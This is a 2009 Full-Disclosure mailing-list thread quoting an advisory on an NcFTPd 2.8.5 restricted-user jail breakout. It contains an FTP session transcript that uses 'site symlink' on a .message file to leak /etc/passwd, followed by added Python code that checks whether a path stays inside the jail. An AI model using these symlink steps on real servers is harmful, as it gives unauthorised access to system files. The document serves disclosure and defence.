Date: Mon, 27 Jul 2009 15:55:22 -0400
From: Jeremy Brown <0xjbrown41@...il.com>
To: Kingcope <kcope2@...glemail.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: NcFTPd <= 2.8.5 remote jail breakout

You seem to be very forgetful lately kcope! But it is ok, because your
research is always interesting. We forgive you :)

On Mon, Jul 27, 2009 at 3:50 PM, Kingcope<kcope2@...glemail.com> wrote:
> Hello list.
> Just to clarify, the NcFTPd vulnerability affects all operating systems
> that NcFTPd runs on,
> not just FreeBSD.
>
> Cheers,
>
> kcope
>
>
>
> 2009/7/27 Kingcope <kcope2@...glemail.com>:
>> NcFTPd <= 2.8.5 remote jail breakout
>>
>> Discovered by:
>> Kingcope
>> Contact: kcope2<at>googlemail.com / http://isowarez.de
>>
>> Date:
>> 27th July 2009
>>
>> Greetings:
>> Alex, Andi, Adize, wY!, Netspy, Revoguard
>>
>> Prerequisites:
>> Valid user account.
>>
>> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>>
>> # ftp 192.168.2.5
>> Connected to 192.168.2.5.
>> 220 localhost NcFTPd Server (unregistered copy) ready.
>> Name (192.168.2.5:root): kcope
>> 331 User kcope okay, need password.
>> Password:
>> 230-You are user #1 of 50 simultaneous users allowed.
>> 230-
>> 230 Restricted user logged in.
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> get /etc/passwd passwd
>> local: passwd remote: /etc/passwd
>> 502 Unimplemented command.
>> 227 Entering Passive Mode (192,168,2,5,219,171)
>> 550 No such file.
>> ftp> ls ..
>> 227 Entering Passive Mode (192,168,2,5,218,102)
>> 553 Permission denied.
>> ftp> mkdir isowarez
>> 257 "/isowarez" directory created.
>> ftp> quote site symlink /etc/passwd isowarez/.message
>> 250 Symlinked.
>> ftp> cd isowarez
>> 250-"/isowarez" is new cwd.
>> 250-
>> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
>> 250-#
>> 250-root:*:0:0:Charlie &:/root:/bin/sh
>> 250-toor:*:0:0:Bourne-again Superuser:/root:
>> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
>> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
>> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
>> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
>> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
>> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
>> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
>> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
>> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
>> 250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
>> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
>> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
>> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
>> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
>> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
>> 250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
>> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
>> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
>> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
>> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
>> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
>> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
>> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
>> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
>> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
>> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
>> 250-test:*:1003:1003:test:/home/test:/bin/sh
>> 250-+testx:*:::::/bin/sh
>> 250
>> ftp>
>>
>> +on FreeBSD you can symlink directories like '/'
>>
>> Cheerio,
>>
>> Kingcope
>>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
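The breakout in the quoted advisory works because the server follows a user-created symlink (`isowarez/.message` -> `/etc/passwd`) when it prints the directory message, without checking that the resolved target still lies inside the restricted user's jail. The following is an added example (not NcFTPd code, and not from the thread) of the containment check a server should apply before reading any client-influenced path; the jail layout, file names and `read_message_file` helper are constructed for the demonstration.

```python
import os
import tempfile


def resolve_inside_jail(jail_root, requested):
    """Resolve a jail-relative client path (symlinks followed) and return the
    real path only if it is still inside the jail; otherwise return None."""
    jail_real = os.path.realpath(jail_root)
    # The client sees the jail as "/", so strip any leading slash.
    candidate = os.path.join(jail_real, requested.lstrip("/"))
    target = os.path.realpath(candidate)
    # commonpath (not startswith) avoids "/jail" vs "/jail2" prefix confusion.
    if os.path.commonpath([jail_real, target]) != jail_real:
        return None
    return target


def read_message_file(jail_root, cwd):
    """Hypothetical banner logic: read cwd/.message only if its resolved
    target stays inside the jail. Returns the text or None if refused/absent."""
    target = resolve_inside_jail(jail_root, os.path.join(cwd, ".message"))
    if target is None or not os.path.isfile(target):
        return None
    # Note: check-then-open is racy; a production server should open with
    # O_NOFOLLOW and re-verify the opened file (fstat) rather than trust this.
    with open(target) as f:
        return f.read()


def demo():
    """Constructed scenario mirroring the advisory: a symlink created inside
    the jail pointing at a file outside it, plus a legitimate .message."""
    with tempfile.TemporaryDirectory() as base:
        jail = os.path.join(base, "jail")
        os.makedirs(os.path.join(jail, "isowarez"))
        outside = os.path.join(base, "secret.txt")  # stands in for /etc/passwd
        with open(outside, "w") as f:
            f.write("root:*:0:0:Charlie &:/root:/bin/sh\n")
        # Equivalent of: quote site symlink /etc/passwd isowarez/.message
        os.symlink(outside, os.path.join(jail, "isowarez", ".message"))
        os.mkdir(os.path.join(jail, "pub"))
        with open(os.path.join(jail, "pub", ".message"), "w") as f:
            f.write("welcome\n")
        # Expected: the escaping link is refused, the in-jail file is served.
        return (read_message_file(jail, "/isowarez"),
                read_message_file(jail, "/pub"))
```

The same `resolve_inside_jail` check belongs in front of every path-taking command (RETR, LIST, CWD, and SITE SYMLINK itself), since a link is only dangerous when some later operation dereferences it without re-checking.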